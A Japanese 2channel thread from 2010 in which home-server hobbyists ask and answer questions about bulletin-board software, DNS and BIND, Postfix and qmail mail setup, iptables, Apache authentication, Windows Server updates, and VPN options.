自宅サーバで使えるフリーの掲示板を探しているのですが、 初めてなので何がいいのかさっぱりわかりません・・・ OSは Ubuntu 8.04.4 LTS ですが、下記条件を満たすお勧めありませんでしょうか? そんなに難しい条件ではないので、全部満たすもの結構ありそうですが、 一応優先度は上から順番に高いです。 1. youtubeなどの動画を貼れる(今大体どんな掲示板でもOK?) できればあまりPCの知識がない人でも簡単に貼れるとありがたいですが、 とりあえずはyoutubeからタグ引っ張ってきて貼れればOKです。 2. スレッド型 3. パスワードを知ってる人しか書き込みができない or 閲覧できない 4. 使うポートを変えれる よろしくお願いします。
正直ありすぎて困る。 逆に「これは嫌」という具体例を示してもらえたほうが良い。
503 :
501 :2010/06/21(月) 20:59:13 ID:???
>>502 ですよね・・・
といってもまだ一つも使ったことないので嫌な機能というのはわからないですね。
この条件満たしつつ、シェアが一番高いのだとどうでしょう?
困ったときに調べやすいのでそれがいいかなと思ってます。
>>501 少なくとも4はcgiの範疇じゃ無理だと思うのだが。
>>501 3もCGI側ではなくウェブサーバ側の認証機能でやった方が良くないかい
506 :
DNS未登録さん :2010/06/21(月) 23:07:57 ID:UfzqTJOY
質問です。 自分の鯖にアクセスする人のIPアドレス、ホスト名が数日にわたり同じという場合は 同一の人物からのアクセスと考えていいのですか?
考えていいかもしれないが、別人物って可能性もある。 それだけじゃ判断出来ない
>>506 大学の教育演習施設や中規模の一般企業とかだと単一のインターネットゲートウェイプロキシを
通してくるだろうから公開ウェブサーバに残るアクセスログに記録されるIPアドレスはかわらんだろう。
そしてまともに管理されて入ればどの端末でも同じバージョンのウェブブラウザであるはずだ。
その前庭の上でその組織内でウェブサーバ上のコンテンツが話題になって
複数の人がとっかえひっかえアクセスしにきている、という可能性が考えられる。
509 :
501 :2010/06/22(火) 00:10:05 ID:???
>>504 、
>>505 確かにご指摘のとおりです。
掲示板設置するのにこれは必須だなという条件を挙げてしまったので、
この条件は無視してもらっていいです。
>>506-507 先に来た人が切断した後、同じIPを割り当てられた人が
同じサイトに訪れる可能性はかなり低いけどね
UAが同じかどうかってのも含めるとさらに絞れると思うけど、
同じ人が複数のブラウザを使い分けている可能性もあるし
どれも確実じゃないから「もしかしたら同じ人かも?」程度に考えておくといいよ
で、今に至るまで自分で探して候補の一つも見つからんのかい? そもそも板違いだし
>>509 条件だけ考えていくとOpenPNEでいいのでは?
登録ユーザだけ書き込み閲覧ができてスレッド型で
YouTubeの動画がインラインで張れればいいんだろう?
あとはふたば互換スクリプトを探していくのがいいとおもうぞ
513 :
500 :2010/06/22(火) 15:33:27 ID:???
>>513 その二択ならNECがいいよ。電源の質も良いし。
まぁ、俺もNECだな。
私なら、どちらも選ばない。 なぜならそれらは全部オスだからだ。
面白いこと言ったつもりなんだろうか
わからないなら素直に聞けよ
520 :
500 :2010/06/23(水) 17:04:59 ID:???
HP買ってしまいました。 届いたら頑張って設定します。 ありがとうございました。
・・・何故・・・
5800/110Gx と ML11xG5 の対比だと 後者はベーシックマネージメントコントローラが最初からついていて リモートマネージメントモジュールを後付け出来るというメリットがある 前者はその辺何もできない
523 :
DNS未登録さん :2010/06/24(木) 23:50:32 ID:TLFIknjG
自宅サーバ二台で運用してるやついる? 出来るのか気になる。 出来るならもう一台いこうかな
>>523 3台までならいけるわ。
本気出したら4台まではがんばれる。
場所さえあれば何台あってもいいと思うけど…。管理は面倒だが。 いいスペックのを一台用意して、仮想化で複数台運用とかもいまならできるね。
2台どころかISPも2契約だったりな
え? ISPなんて正副予備で3つ契約が常識だろ。 ちなみに常時稼動で3台。電気代は冬場で1万前後。
528 :
523 :2010/06/25(金) 02:08:31 ID:KRE9yUOK
>>524 なるほど
つまり2台は楽勝ということですね
>>525 1Kれす^q^
ML115が一台余っているんだ・・・
>>526 お金はかかるけどISP2契約が一番楽そう
>>527 ISP3つとかw
台数じゃなくて、何をしたいかだろ?
530 :
523 :2010/06/25(金) 02:14:15 ID:KRE9yUOK
>>529 確かにそうですね
1台目はPT2録画サーバ、iphoneへの動画ストリーミング配信、FTPサーバ、WebDAV、ファイルサーバとして使っていて2台目でWebサーバ運用したいんです。
ただ1台目のOSがwindows home serverとかいうやつでWeb公開が出来ないっぽくてもう1台導入したいんです
普通に一台で問題なさそうだけど
532 :
523 :2010/06/25(金) 02:18:55 ID:KRE9yUOK
>>531 あれ?
windows home serverでWeb公開って出来るんですかね?
使ったこと無いから知らんけど、ライセンス以外で障害はないだろ
534 :
523 :2010/06/25(金) 02:24:50 ID:???
うーむなるほど ライセンスの障害はでかいですw
じゃ、linuxでもいれて一台にまとめればOK
536 :
523 :2010/06/25(金) 02:43:34 ID:???
iPhoneへのストリーミングに使っているソフトがWindows系かMacOSじゃないと動かないんですよね・・・ PT2用のTvRockもLinuxのepgより使い易いし。 ISP2契約が一番簡単ですかね?
537 :
524 :2010/06/25(金) 07:39:43 ID:???
てっきりネタ質問だと思った。 出来るできないってどういう意味で言ってるんだ。 回線と台数なんて関係ないだろ。
>>536 サーバの方は色々調査確認済みのようなので、
読んでる限りは2台構成の方が無難だと思う。
回線については
・2台のサーバでサービス用ポートが重複していて変更も難しい。
・1回線だと帯域が足りない。
・サービス用と自分が外に出ていく用のIPアドレスは別にしたい。
などに合致するなら、2回線契約するのはアリでしょう。
フレッツなら線1本で2セッションいけるし。(3つ目からは500円ずつ追加だっけか)
>>530 windows home server でhttp https はまったく問題なく使えるよ。
おまけにmsのDDNSならhttpsでもSSL証明書をベリサインから高い金出さずにIEで警告でない。
540 :
困った。 :2010/06/25(金) 14:38:09 ID:???
自宅鯖じゃないんだけどWindows 2000 Serverで DNS、メル、ウェブ鯖立ててるんだけど 7月以降サポート切れたらやっぱりやばいかな 移行面倒なんだけどなにかいい手は無いものか。 あまり高くなければ有料でもいいのだけど。
542 :
困った。 :2010/06/25(金) 15:09:06 ID:???
>>541 やはりそうなりますよね。
Ubuntuしかわかりませんが。Ubuntuにしておこうかな。
543 :
困った。 :2010/06/25(金) 16:11:27 ID:???
Ubuntuのpptpdってパケットフィルタリングできないんですかねー Windows2000serverは接続してきたクライアントに対して どのIPアドレスどのポートにのみアクセス可能とかいろいろ 設定できるんですがねー
545 :
困った。 :2010/06/25(金) 16:34:01 ID:???
>>544 あれ?iptablesでできるんだすかー。さんくす。
なんかVPNで入ってきちゃったらどこでフィルタリングするんだーって思ってたけど。
>>545 pptpとはいえLinux上ではppp*のインターフェイスから入ってくるIPパケットなので、
"iptables -A FORWARD -i ppp+" ("ppp+" は "ppp" で始まる任意のインターフェイス)
などで設定すればいい。
547 :
困った。 :2010/06/25(金) 17:07:32 ID:???
>>546 サンクス。iptablesはわからないのでufwでやってみます。
548 :
DNS未登録さん :2010/06/25(金) 23:51:07 ID:l871Ky7R
教えてください CentOS5.4を使って自宅鯖を作ってみようと考え、 IPであるならば公開できる状態にはなりました。 DNSのところでつまずいてます。 おなまえどっことむなどのDNSサーバーを使えば 自宅鯖にBINDはいらないということでしょうか?
大体あってる
550 :
548 :2010/06/26(土) 00:26:51 ID:CN1Fqbv3
いろいろ本やら読んでみましたがどうもDNSが理解できないです。。 さらに教えてください。 バーチャルホストをIPベースで公開する場合にそのIPアドレスが 固定IP(グローバル)だとしたら、 外部のDNSサーバーを使うんであればBINDは不必要で hostsファイルだけにIPアドレスとホスト名を書いておけばよいのでしょうか? このケース試せないのですが気になります。
・192.0.2.1が固定IP、www.example.comがサイトだとする ・ApacheあたりでIPベースバーチャルホストが適切に設定されているとする このとき"外部のDNSサーバ"がwww.example.comは192.0.2.1だと返すならサイトは外から見られるだろう この設定は"外部のDNSサーバ"に対して行う必要があるが、ローカルのhostsには特に書く必要はない
>>550 DNSは簡単に言えば、ホスト名(FQDN 例えば www.exsample.con ) をIPアドレスへと変換してくれる装置。
例えば、pc11.2ch.net は 207.29.253.145 であると教えてくれる。それだけ。
BINDはDNSサーバーだから外部のDNSサーバーを使うなら不要
ついでに言えばIPベースバーチャルホストは複数アドレスのグローバル固定IPでがなければ公開は無理。
553 :
548 :2010/06/26(土) 10:31:11 ID:SzzmXfQw
>>551 >>552 ぐぐって勉強していたところIPベースのバーチャルホストは
「ゾーンファイルにAコードを追加する」となっていたので
かならずBINDが必要になってくるのかと思いました。
ありがとうです。わかりやすい
ホスト名とサービス名を渡すとIPアドレスとポート番号を返してくれる名前解決の手段があればいいな。 実装は簡単だけど普及させるのが大変だよなぁ。
555 :
548 :2010/06/26(土) 15:44:40 ID:QMJMOuM9
また難解になってきた IPベースのバーチャルホストの場合 サーバーがPostfixなどでメールもバーチャルドメイン管理するならば 結局BINDの設定が必要になる??????? 迷宮いりです。。。
>>555 BINDはDNSサーバーだって理解できているよね
DNSサーバーはドメインやFQDNをIPアドレスに変換するものって理解できているよね
BINDの設定が必要となる場合はDNSが必要で、他で立てていない場合だって理解できているよね
ここを本当に理解できていれば解る筈なんだけどな。
つまりメールも
ドメインを使ってかつ他でDNSたてていないのならBINDは必要。
IPアドレスでやれば不要。
[email protected] とかね。
ドメインが付くメールアドレスを使う場合はDNSが必要。
その場合DNSが他でたっていなければ自前でDNSを立てる必要があり従ってBIND設定が必要になる。
メールサーバーがバーチャルドメインをつかうか使わないかは無関係。
557 :
548 :2010/06/26(土) 16:45:59 ID:QMJMOuM9
>>556 ありがとう。理解がまだ鮮明にできていないっぽいです。
postfixのバーチャルドメインの設定を調べてみたら、
設定ファイルに「ドメイン」名で分けている
なので固定IP(グローバル)が2つあって 例えば
IP ドメイン
111.222.333.444 aaa.com
555.666.777.888 bbb.com
外部のDNSサーバーで変換しようとすれば、
[email protected] で送信されてきたメールをサーバーで受けるときには
DNSサーバーにより
[email protected] と変換されてくる
それが、バーチャルドメインに分けているメールサーバーで
aaa.comなのかbbb.comなのかを判断するのに自サーバーにも
DNSが必要なのかと思ったんです。。
この場合はグローバルの固定IPが二つあるので、
[email protected] 、
[email protected] の
どちらのドメインで送られてきたものかをIPで判断する。
つまり、PostfixでIPで振り分けるような設定が必要となりますか??
もうぐるぐるで・・・教えて下さい。。。
>>558 んじゃMXレコードなんていらないんじゃね?
>>559 めんどくさいやつだなあ。
いちいちすべてのケースを網羅した説明を要求するのか?
>>557 DNSの基本さえ理解できていないのに、メールサーバ立てちゃいかんでしょ。
すぐに止めた方が良いよ。
>>557 アバウトに説明すると、
DNSの設定は「このドメインの情報(IPアドレスとか)を聞かれたら答えちゃうよ」
なのでSMTPとかHTTPとかの特定のプロトコルとはあまり関係ない。
(
>>559 のMXレコードは、メール専用のIPアドレスと思っておけばとりあえずOK)
postfixの設定は「俺はこのドメイン宛のメールを送り付けられたら受け付けちゃうよ」
とかなのでIPアドレスはあまり関係ない。
で、同じメールサーバに複数のドメインを扱うバーチャルホストの設定をすると、
SMTPのRCPT TOで伝えられるドメインに応じて処理を変えてくれる。
なのでIPアドレスは一つでもいい。(もちろん複数でもまったく問題ない)
565 :
DNS未登録さん :2010/06/26(土) 22:36:06 ID:c5T2sxBl
ubuntu10.04鯖でapacheの設定弄ってたら設定してないはずのディレクトリにBASIC認証がかかるようになっちゃった 特に.ht系のファイルも置いてないしconfファイル診てもそれらしい記述がない BASIC認証かけてる元ファイルを追跡する方法ってある?
cat httpd.conf | grep -i AuthType なんか出てくる?
567 :
DNS未登録さん :2010/06/26(土) 23:02:50 ID:c5T2sxBl
>>566 grepとかで全部調べたけど出るのは既にある別のの分だけ
そこをコメントアウトしても駄目
find * | grep '\.htaccess$' なんかでてくる?
569 :
DNS未登録さん :2010/06/26(土) 23:06:18 ID:c5T2sxBl
httpdを再起動してみる
571 :
DNS未登録さん :2010/06/26(土) 23:10:22 ID:c5T2sxBl
572 :
DNS未登録さん :2010/06/26(土) 23:12:25 ID:c5T2sxBl
あとなぜか既存のBASIC認証と同じパスで入れる ただBASIC認証時に出るメッセージが違う見覚えのないものになってる
わざと認証ミスって、エラーログにヒント無いか?
574 :
DNS未登録さん :2010/06/26(土) 23:17:53 ID:c5T2sxBl
>>573 ためしに.htpasswdの位置変えてconfも弄ったら
本来の認証部はちゃんと通って謎の認証は前のpassファイルを参照しに行った
ただ以前のパスでgrepかけても見つからない・・・
575 :
DNS未登録さん :2010/06/26(土) 23:35:38 ID:c5T2sxBl
解決しました なぜかhomeディレクトリ内にhtaccessがおいてあるだけというオチでした
>>548 >DNSのところでつまずいてます。
DNSサーバには大きく分けて
・DNSコンテンツサーバ:自分が保有するドメインのゾーン情報をインターネットに向けて公開する
・DNSリゾルバサーバ:インターネット上に公開されている他者のDNSゾーン情報を参照してくる
の二つの機能がある
この二つの話がごちゃごちゃになっていると理解が進まない
BINDは一つのプロセスでどちらもできる
djbdnsはプログラムが分離されている
nsdは前者しかできない
unboundは後者しかできない
577 :
548 :2010/06/27(日) 09:58:05 ID:IzvqfkJY
実際に動かしたら理解ができるっていうのはもっともなんだけど インターネットの場合、他者に迷惑を掛けてしまうことがあるから なるべく勉強して理解してからやったほうがいいだよね。
579 :
DNS未登録さん :2010/06/27(日) 10:13:42 ID:UJdgE9FF
独自ドメインを使用したいのですが、miniDNSで登録して ドメイン登録の「追加」を押すとエラーで登録できません。 更新履歴を見ると、もう何年も更新されてなさそう・・・ もうメンテナンスされてないのでしょうか?
自宅にサーバーを立てて、メールをサーバーで一元管理して、外出先からでも 読んだり返信したり出来るようにしたいんですが、Linuxを使えばこんなことが 可能ですか?外出先からだとDTI宛てのメールが読めないんでなんとかしたい です。
>>579 miniDNSは新規はもう受け付けていないし、旧ユーザーも有料へ移行されたはず。
他の所を考えて下さい。
zoneeditとかはまだやっているんじゃないかな。
>>583 いや、ウェッブでmailが見れるのは知ってますけど、出来ればサンダーバード
で読み書きしたいんで。あと、Linuxの勉強もかねてサーバーを立ててみたい
というのも理由の一つです。
>>581 レスありがとうございます
了解です、それじゃ別探してみます
>>584 サンダーバードで読み書きしたいなら、サンダーバードにDTIに接続する設定すれば
良いだけな気がしますが…。
メールサーバー立てるなら独自ドメイン取ることになるから、サーバー立てればDTIの
メールが読み書きできるようになるわけじゃないですよ。あと、迷惑メール対策で
メールは自宅鯖ではやりづらくなってます。
>>586 ISPのメ鯖に外から任意に繋げられるのか?
普通無理だろ
DIONはできるよ
>>587 popなんてほとんどのプロバイダーが接続制限なんてしてい無い。
出来ないプロバイダーがあるならむしろ知りたい。
windows2008serverを使っているサイトや企業ってどこですか? 全然見あたらないんですが・・・
うちは使ってます。
えーっともしかしたら、Windows7=NT6.1と同じように Windows2008Server=Windows2003.2Server見たいな感じで2003しかヒットしないとか?
でももうすぐサポート切れるから2008に移行するよね
IIS7が2008からぽいから unknown Microsoft-IIS/7.0 って表示されてるのが2008じゃないかな
>>592 自信はないけど、Microsoft-IIS/7.0ってあるのが2008の可能性はある。
だとしても、ほとんどが2003で相変わらずアレな会社だなぁ。
てかその検索結果で引っかかるのはWEBサーバっしょ? WEBサーバなんざほとんどLinuxとかばっかなんで・・・ その検索結果で調べて windowsserverが全然ない!とは考えない方がいい
>>600 トップから12をいわゆる並列にして疎結合クラスターって方法でアベレージかせいでるのか
>>601 >windowsserverが全然ない!
そんなことは言ってませんよ、Windows2008を上記の理由で知りたかっただけなんです。
失礼があったらすいません。
>>597 それは大丈夫でね?
W2KServerも移行組が少なかったんで延長サポートを2010/7/13までにしたし。。。
同じ理由でLinux移行組が増えそうだったらあわてて延長サポするよ。
すべて商売だもん、延長させてその間でバージョンアップの移行を考えてもらうよう宣伝外交というパターン。
とにかく一番金になる方法でサポートをちらつかせる。これがいつものやり方。
俺の勘ではCentOSかDebianに流れるでしょ。どちらも非常に使いやすいし安定してる。
何よりサポ付きで投資ゼロ。
つかデスクトップもUbuntuとかにもってかれてるんでないの?俺はXPだけどw
中小企業の鯖なんですがUbuntuよりCentOSのほうがいいでしょうか?
会社名は書けないけど、某大手クレカ会社のシステムはserver2k8だよ。 web鯖もdb鯖もbat鯖も何もかも。無論、システム構築&運用は自前。 一時期、鯖の分野ではMS製品はLinuxに取って代わるとか言われてたけど、そ んな事にはなって無い訳で。中小のシステムはapache比率が高まってきてるけ ど、大手ではまだまだMS製品が強いよ。ASP.NETが使いたければWinServerしか 選択肢が無い訳で。
>>608 RHELがいいサポートあるし
サポートいらないならこんなところ質問しないだろうし
その二つの中から選ぶんであればどっちでもいい
管理者が慣れてるほう選べばいいんじゃないかな
>>608 Ubuntuはデスクトップ用途
鯖に使うにはわざわざ不安定要素を加えてるようなものではないかい?いらない物だらけはトラブルの原因
そもそも自宅鯖じゃねえし・・・
エンタープライズ向けスレへ誘導ねがいます
社員二人だし自宅鯖みたいなものだよ
こんにちは。ちょっと質問させてください。 継続的に通信してパケットを飛ばさないとネットワークが一定時間で切断されるというネットワーク環境なのですが、 Windows server(今環境確認できないのですが、確か2003あたり)で 継続的にパケットを送る簡単な設定方法はないものでしょうか? MACアドレスレベルでの動作マシンの登録が必要で、通信が途絶えると認証が途切れるという環境です。 Linuxのサーバーのときはアドホックにcronで10分おきくらいに上位ルーターにping 10回くらい打っていて、 それでOKでした。 それでいいならWindowsでも同様にタスクスケジューラーでpingうっとけ!と言われればそうなのですが、 本来、このような用途で何かOSやネットワーク関係の機能(Keep Alive的な)がもしかしてあるんじゃないのか、 と思い質問させていただきました。 上位のネットワーク管理者にも対処法を聞いたのですが、 サーバーの考慮はまだ完全ではない様子で、 とりあえず定期的に上位にpingでも打っとけばいいんじゃね?くらいに言われてしまいました。 規模的や環境的には自宅鯖みたいなものなのですが、 板的に趣旨と違いそうなので、もしネットワーク関係でより適切な板、スレがあれば誘導下さい。
>>616 インターネットゲートウェイルータ自体にkeep alive機能が無いかどうか確認してみたら
なつかしいな。 Air-H"でネトゲやるときにAirKeeper使ってそれやってたわ。 鯖では↑使うなよ?w
620 :
616 :2010/06/29(火) 08:31:37 ID:???
くだ質ですみませんが教えてください。 2003R2でpt2刺してspinel動かしたりAN HTTPDaemonとか MoreFTPdとかを動作させていました。 2日程前にwindowsアップデートして再起動したら HTTPDが「サーバソケットを使用できません」と出て動かなかったり spinelが「多重起動です」と動かない状態です。 どこか設定を弄れば動くと思ってググッたりしてますが 家に遊びに来た際に友人が設定した環境で 私自身は触った事の無いOSなので「何が判らないかも判らない」状態です。 判らんならそんなOS使うなと言えばそれまでなんですが 友人が遺した物なのでなんとか動くように設定したいと思っています。 内容が不明瞭でエスパーしか回答出来ない内容かもしれませんが アドバイス等頂けると助かります。 宜しくお願いします。
割れか
マジレスなんだけど。 学生時代こんなん頼まれたことある。 身内の知り合いが地方でプロバイダやってて なぜか割れ厨のおいらの方までにWinServerの割れが欲しいって言ってきたことがあるw 今考えたら固定IPで割れるからだったんだな。と。
624 :
621 :2010/06/29(火) 15:37:11 ID:???
TechNetに金払ってます。 動いてるんだkら放置しとけば良かったのに なんでアップデートなんかしちゃったんだろう・・・
金を払ってるならサポートにTELすると良い
>>621 pt2もANHTTPもMoreFTPdも2003R2に対応してないからだよ
OS変えればおk
>622 みたいに2k3r2使ってると聞いただけで割れを想像する辺りが、逆に >622 が割れ厨である事を示してるよねw server2k3やserver2k8を正規に使ってる個人ユーザは普通にいるのにねw 割れ厨の >622 からすれば割れにしか思えないんだろうねww
自宅鯖として使っている&知識のないユーザは少ないと思うが。
629 :
621 :2010/06/29(火) 19:52:31 ID:???
>>626 4〜5日前までは普通に動いてたんですよ。
設定した友人が先日亡くなったんでセレモニー的な意味で動く状態で
保管してあげたいなぁと思った位の物なのでくだらない&基本以下の質問ですみませんが
お暇ならアドバイス頂ければと思います。
>>627 窓鯖を個人で使ってる人はそれなりにいると思うけど
流石に
>>621 の使い方してるやつはそうはいないからなぁ
割れだって決め付けるのもよくないけど
>>627 まぁ実際割れ違法コピーが半数以上ってデータがあるくらい有名なナニだしね(大枚払ってる人にはとばっちりねw
それにしてもひどいわWinUpDate&有償サポ・・・何万も取るんでしょ?
こんなアップデートプログラムがまかり通ってること事態あり得ない
普通に損害賠償物だよ
だってlinuxの得意分野ばかりじゃん なのにwinなんて
2003R2ってシステムの復元でロールバックできなかったっけ?
635 :
621 :2010/06/29(火) 21:57:28 ID:???
手動でアップデートされた部分を追加と削除で消して見ましたが駄目でした。 xpみたいにロールバック出来れば楽勝だったんですがそれらしい項目が無かったです。 気長にググッたり弄ったりしてみます。
>>616 putty起動して、定期的にping飛ばすか何かするようなスクリプトを走らせる。
>>632 Windowsに限らず、LinuxでもMacでも十分に有り得る話だけどね
で、そういう時に何とかさせるためのサポートがあるわけで
絶対に不具合の出ないパッチを出させるためのサポートじゃないよ
ん?サーバったらコンシュマーはエンタープライズな場合が多いわけでしょ? ウィンドウズアップデートレベルでこんな不具合があったら多大な欠損が生じるって話。 場合によっては1分で数万数十万の損金が普通出るわけでしょ? しかも高いお金払ってサポートに入会して解決せずにここで質問してるわけでしょ?
以前もWindows Updateが終了しない不具合とか、CPU使用率100%なって不具合がでるとか、 Microsoftサイトで不具合の説明と謝罪文掲示してたな。どこでも問題あれば集団訴訟とか普通じゃね?
今日大規模な停電があって、UPSを完備していたのですがバッテリーが死んでいた様子で そのまま落ちてしまいました。その後、再起動をしたのですが問題なく動いている様子です。 確認したらいい事ってありますか?
fucks
>>639 サードパーティ製のソフトの悲しいところだな
最終的にはIIS使えとか言われたりするんだろうか
Windowsっていえば、ビルゲイツがWin2kを出したとき、もうWinシリーズを開発しないので Win200Xはないって明言して、W2K鯖に飛びついた企業が文句言ってた話思い出すw windowsupdateって今もアップデートやバグフィックスでリブートとかさせるの? Linuxからすると鯖OSとして信じられないんだよね。ま、MSOfficeがあるうちはイントラネット鯖で売れるんだろうけど。
というか、勝手にリブートするから更にタチがわるい
自動で再起動するのってコンシューマ向けのデフォルト設定ってだけでしょ。 サーバー向けでその設定かどうかは知らんが、 少なくとも自動更新で自動的に再起動するしないの設定は普通にある。
Linuxのアップデートも再起動いるやん
>>648 Debianはいらない。前のバージョンまではカーネルの更新で再起動だったけど、
今はそれすらいらなくなってしまったみたい。
一応月に2回念のためリブートしてるけど。
>>650 犬厨は黙ってろw屑がw
>>646 勝手にリブートなんかしませんが何か?
スキルが無いのを人のせいにする低脳乙としかw
昨今であるならば不意の再起動があっても有人介入すること無く 自律的に必要なデーモンがたち上がるようにしておくというのが正しい メインフレームやベクトル計算機じゃあるまいし、停止再起動する時には オペレータ介在がなければダメなんてほうが実状にあってない
>不意の再起動 これは停電とか物理的な問題だな。 カーネル部分の更新でOSの再起動が必要だとしても、常識的に考えてオペレーターがタイミングを決めて実行するわな。
655 :
DNS未登録さん :2010/07/13(火) 19:17:18 ID:hOp8i7vC
windowsの読み取り専用属性の解除ができません。 windows server 2008 R2を導入したのですが、読み取り専用属性が解除できなくて、サーバーに「XOOPS」が導入できません。 症状は読み取り専用の属性を解除して、プロパティをとじて、またプロパティを開くと読み取り専用属性が解除されていないものです。 Googleで検索してみたが、windows server 2008 R2に関するものがなく、ほかのバージョンのwindowsの方法も試したが、全部うまくいきませんでした。 どうしたらこの属性を解除できますか? ーーーーーー 調べてみたらCドライブの中のすべてのフォルダに読み取り専用属性がありました。
ふう
657 :
DNS未登録さん :2010/07/15(木) 20:03:12 ID:yYnKSLdx
自宅にサーバを設置していたのですが、負荷が大きくなってきたため2台体制にしようかと思っています。 今までは1台のサーバに複数のドメインを設定しており、そのドメインを振り分けたいのですがどのように設定方法があるのでしょうか? 私の現在の知識では、ルータでポート毎に振り分けをおこなっているため2台のマシンに振り分ける方法が思いつきません。 どうかお知恵をお貸しいただければと思います。
回線もう一本引けばOK
プロ棋士雇えばおk
つ リバースプロキシ
661 :
DNS未登録さん :2010/07/15(木) 23:30:11 ID:lHYZASWs
自宅のネットワークに外から繋げることができるよう VPNを構築したいと思っています。 自宅環境はフレッツ光を利用しており、動的IPがひとつ割り与えられており、 割り当てられた動的IPはDDNSによって外から名前解決できるようにしています。 自宅内部ではActiveDirectoryを構築しています。 初めはWin2008のDirectAccessを検討していましたが DirectAccessは静的な2つの連続したグローバルIPが必要みたいですので諦めました。 そこで他の方法が必要になったのですがベターな方法はどれでしょうか。 クライアントはWin7でサーバーはWin2008です。 Webで調べるとLinuxの資料がよく見つかるのですが、できたらLinuxを新しく構築することは避けたいです。 ただ、VPNサーバーはLinuxが常識で、Winで組むのは可能だが極めて稀、というくらいなら この際Linuxを導入してもよいかと思います。 どうせ覚えるなら一般的な手法がよいからです。 Winメインのネットワークに対してVPNを構築するならVPNサーバーは どのOS+ソフトが主流でしょうか。
yamahaのVPNルーターでも使えば?
>>641 その完備したつもりになってるUPSのバッテリだな。
既婚者は嫁に鯖どうやって説明してる?
普通に買ってきて設置してる。 文句を言われないぐらいは稼いでるつもりだ
>>661 662のようにルータにVPN機能を持ってるやつでいいんじゃないかと思う。
ヤマハでもいいし、自分はiPadからも繋ぐのでCiscoを使ってるが、
仕事場から使うとなるとIPsec VPNを許可していない企業も多いので注意。
RDPで繋ぐ時だけssh port forwardingして、
VPNは電子書籍を見る時に使ってるかな。
>>664 むしろ積極的に使わせてる(ntpなりsambaなりプリンタ共有なりを)
とはいえ次になんか組む時はHDD安くて大容量になってるし
レンタルサーバに移行するかもしれない、なんて話も二人でしてる
自宅鯖とか小規模向けのOpenVPN互換機能ついたルーターってないの?
ルータースレ見つけたのでそちらで聞いてきます。失礼しました
Apacheのserver-statusが動かないんだけど原因ってどうすればわかる?
ubuntu10.04だけどmod_status.soは読み込みしてるし<Location /server-status>もちゃんとかけてると思う
<IfModule mod_status.c>
#
# Allow server status reports generated by mod_status,
# with the URL of
http://servername/server-status # Uncomment and change the ".example.com" to allow
# access from other hosts.
#
<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from localhost ip6-localhost
Allow from 192.168.11.0/24
</Location>
</IfModule>
スマソ、上書いた後リンククリックしたらいけた スペルミスってただけでした・・・w
674 :
DNS未登録さん :2010/07/19(月) 19:12:40 ID:J2Ahmgmd
Debian Lenny で qmail な鯖を構築したものです。 同じドメイン同士の送受信は問題なくできるのですが 外のドメインだと送受信が出来ずにいます。 ログなどを調べた結果、メール・キューがたまっている状態でした。 どこがいけないのでしょうか?
675 :
DNS未登録さん :2010/07/19(月) 19:22:44 ID:J2Ahmgmd
ちなみに OP25B も疑って submission port 587 を使用しております。 lsof -i:587 の結果ですが OMMAND PID USER FD TYPE DEVICE SIZE NODE NAME tcpserver 22636 qmaild 3u IPv4 845488 TCP *:submission (LISTEN) となっております。
677 :
DNS未登録さん :2010/07/19(月) 19:39:30 ID:J2Ahmgmd
679 :
DNS未登録さん :2010/07/19(月) 19:53:44 ID:J2Ahmgmd
680 :
DNS未登録さん :2010/07/19(月) 20:07:08 ID:J2Ahmgmd
ちなみにメーラー上では送信できたってことになっている・・・ つまり送信済みってとこにメール本文が入っているのよ。 これっておかしくない?
681 :
DNS未登録さん :2010/07/19(月) 20:10:54 ID:J2Ahmgmd
送れていると思われるメールログ・・・・
ul 19 20:02:55 hoge qmail: 1279537375.704924 status: local 1/10 remote 1/20
Jul 19 20:02:55 hoge qmail: 1279537375.712848 delivery 1098: success: did_1+0+0/
Jul 19 20:02:55 hoge qmail: 1279537375.712952 status: local 0/10 remote 1/20
Jul 19 20:02:55 hoge qmail: 1279537375.712991 end msg 4720280
Jul 19 20:05:26 hoge qmail: 1279537526.773850 new msg 4720275
Jul 19 20:05:26 hoge qmail: 1279537526.773964 info msg 4720275: bytes 727 from <
[email protected] > qp 12687 uid 64011
おっかしーなーーーー
そりゃメーラーから見たらサーバーには届けたわけだから、送信済みでは? で、受け取ったサーバー側でため込んでるだけ。 OP25Bに対応するためには、中継サーバーが通常は必要になる。それが調達 できてないなら無理。
683 :
DNS未登録さん :2010/07/19(月) 20:17:47 ID:J2Ahmgmd
>3.お客様で設置したメール送信サーバをご利用の場合 >お客様ご自身で設置したメール送信サーバの設定方法や設置方法については、 >@T COM(アットティーコム)のサポート対象外となっております。 だめじゃね?中継用smtpサーバのIPも書いてないし
685 :
DNS未登録さん :2010/07/19(月) 22:55:26 ID:J2Ahmgmd
>>684 なんか t-com の smtp 使えって書いてあるじゃない?
一応 t-com のメールも使ってるから
それにしようかなって思ったんだけど。
ダメっぽい?
686 :
DNS未登録さん :2010/07/19(月) 23:03:39 ID:yz4DR95t
仕事でVPS運用していたのですが、データベース練習用に自宅にもサーバーを立ているのですが、 どうもDNSサーバーが安定せずどなたか解決の糸口を見つけられたらと思い質問させて頂きます。 フレッツ用ルーター(192.168.1.1)---+----サーバー用ノートPC(CentOS5)(192.168.1.2、ホスト名example.com) | +-------デスクトップPC(WindowsXP)(192.168.1.3) 上記構成で、CentOS上でDNS(BIND)をたて、ルーターの設定でDNSの値をサーバーのIP(192.168.1.2)に設定。 デスクトップPCからサーバにSSHで接続しているのですが、接続してしばらくすると切断されてしまいます。(SSH上作業中でも) (ネットワークエラーソフトウェアが接続中止を引き起こしました) SSHでタイムアウトがが起こると、デスクトップPCからの接続で名前解決がどうもできなくなるようで、 外部のサイトにもアクセスできなくなります。Windowsのネットワーク接続の修復で、再度接続が可能になります。 ルーターのDNSをルータのIPに戻すと、上記問題は発生せずSSHも切断されることがありません。 当然のことながらデスクトップからホスト名example.comにはアクセスできなくなってしまいます。 DNSの設定によって安定しないのだとは思うのですが、考えられる要因はありますでしょうか? なお、digなどによるテストは全て正常に返ってきます。
>>675 の状態は「submissionで接続受付」
OP25Bで要求されるのは「submissionで送信(転送)」
>>683 のページもチラと見たけど、さらにqmailからの送信時にSMTP認証が必要。
>>686 "サーバー用ノートPC"へのアクセスができなくなれば名前引けなくなるのは当然
>SSHも切断されることがありません
これは"サーバー用ノートPC"へのアクセスなの?
その場合IPアドレスで接続してるの?
最初の設定でその接続方法をとった場合は切断されるの?
切断されたときに"サーバー用ノートPC"へpingは飛ぶ?
"サーバー用ノートPC"のログは?
ルータでDNSサーバ設定ということからするとDHCPのリース間隔との関連は?
